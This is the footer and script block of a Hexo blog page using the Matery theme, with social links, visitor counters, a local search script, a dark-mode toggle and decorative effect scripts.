    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2023</span>
            
            <a href="/about" target="_blank">Know5</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/Know5" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:2012989586@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2012989586" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 2012989586" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    
        
        <script type="text/javascript">
            // 只在桌面版网页启用特效
            var windowWidth = $(window).width();
            if (windowWidth > 768) {
                document.write('<script type="text/javascript" src="/libs/others/sakura.js"><\/script>');
            }
        </script>
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
     
        <script type="text/javascript">
            // 只在桌面版网页启用特效
            var windowWidth = $(window).width();
            if (windowWidth > 768) {
                document.write('<script type="text/javascript" src="/libs/others/star.js"><\/script>');
            }
        </script>
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.5'
        zIndex="-1" count="99"
        src="/libs/background/canvas-nest.js"></script>
    

    

    
    <script type="text/javascript" src="/libs/background/ribbon-dynamic.js" async="async"></script>
    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
